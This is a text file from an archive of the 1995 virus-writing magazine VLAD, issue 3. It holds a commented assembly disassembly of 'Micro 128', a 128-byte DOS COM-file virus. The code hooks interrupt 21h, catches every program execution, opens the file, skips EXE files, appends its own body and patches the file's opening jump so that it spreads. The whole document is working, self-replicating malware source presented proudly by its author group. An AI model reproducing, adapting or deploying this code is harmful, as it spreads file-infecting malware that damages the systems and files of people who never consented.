home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / MAGS.ZIP / VLAD#3.ZIP / ARTICLE.3_6 < prev    next >
Encoding:
Text File  |  1995-02-06  |  4.4 KB  |  104 lines
  1.  
  2. ;                             Darkman/VLAD
  3. ;                           Proudly Presents
  4. ;                       Disassembly of Micro 128
  5.  
  6.  
  7. micro128     segment
  8.              assume  cs:micro128,ds:micro128,es:micro128
  9.              org     100h                ; Origin of COM-file
  10.  
  11. code:
  12. jumpcode     db      0e9h,03h,00h        ; Jump to viruscode
  13. viruscode:
  14. realcode     db      0cdh,20h,90h        ; Real code of infected file
  15.  
  16.              lea     di,code             ; DI = offset of code
  17.              push    di                  ; Save DI at stack
  18.              mov     si,di
  19.              add     si,[di+01h]         ; SI = delta offset (viruscode)
  20.              movsw                       ; Move the real code to beginning
  21.              movsb                       ;  "    "   "    "   "   "     "
  22.              xor     ax,ax               ; Clear AX
  23.              mov     es,ax               ; ES = interrupt table
  24.              mov     di,303h             ; DI = offset of hole in memory
  25.              mov     cl,7dh              ; Move 125 bytes
  26.              rep     movsb               ; Move virus to hole in memory
  27.              scasw                       ; Overwritten anything?
  28.              jne     virusexit           ; Not equal? Jump to virusexit
  29.              std                         ; Set direction flag
  30. setintvec:
  31.              xchg    ax,es:[di+0fd04h]   ; Exchange AX with int 21h
  32.              stosw                       ; Store address of interrupt 21h
  33.              mov     ax,033fh            ; AX = offset of virusint21
  34.              cmc                         ; Complement carry flag
  35.              jb      setintvec           ; Carry flag? Jump to setintvec
  36.              cld                         ; Clear direction flag
  37. virusexit:
  38.              push    cs                  ; Save CS at stack
  39.              pop     es                  ; Load ES from stack (CS)
  40.              ret                         ; Return!
  41. mvfptrbegin:
  42.              mov     al,00h              ; Move file pointer from beginning
  43. movefileptr:
  44.              mov     ah,42h              ; Move file pointer
  45.              xor     cx,cx               ; Clear CX
  46.              xor     dx,dx               ; Clear DX
  47.              int     0e0h                ; Do it!
  48.  
  49.              mov     cl,03h
  50.              mov     dh,03h
  51.              ret                         ; Return!
  52.  
  53. micro128cod  db      0e9h,?,?            ; New code of infected file
  54. virusint21:
  55.              cmp     ah,4bh              ; Load or execute?
  56.              jne     int21exit           ; Not equal? Jump to int21exit
  57.  
  58.              push    ax                  ; Save AX at stack
  59.              push    bx                  ; Save BX at stack
  60.              push    dx                  ; Save DX at stack
  61.              push    ds                  ; Save DS at stack
  62.  
  63.              mov     ax,3d02h            ; Open file (read/write)
  64.              int     0e0h                ; Do it!
  65.              jb      closefile           ; Below? Jump to closefile
  66.              mov     bx,ax               ; BX = file handle
  67.  
  68.              push    cs                  ; Save CS at stack
  69.              pop     ds                  ; Load DS from stack (CS)
  70.              call    mvfptrbegin
  71.  
  72.              mov     ah,3fh              ; Read from file
  73.              int     0e0h                ; Do it!
  74.              cmp     byte ptr ds:[300h],'M'
  75.              je      closefile           ; Equal? Jump to closefile
  76.  
  77.              dec     ax                  ; Decrease AX
  78.              call    movefileptr
  79.              mov     ds:[33dh],ax        ; Store offset of virus code
  80.  
  81.              mov     ah,40h              ; Write to file
  82.              mov     cl,(codeend-viruscode)
  83.              int     0e0h                ; Do it!
  84.  
  85.              call    mvfptrbegin
  86.  
  87.              mov     dl,3ch              ; DX = offset of micro128cod
  88.              mov     ah,40h              ; Write to file
  89.              int     0e0h                ; Do it!
  90. closefile:
  91.              mov     ah,3eh              ; Close file
  92.              int     0e0h                ; Do it!
  93.  
  94.              pop     ds                  ; Load DS from stack
  95.              pop     dx                  ; Load DS from stack
  96.              pop     bx                  ; Load DS from stack
  97.              pop     ax                  ; Load DS from stack
  98. int21exit:
  99. jumpfar      db      0eah                ; Object code of jump far
  100. codeend:
  101.  
  102. micro128     ends
  103. end          code
  104.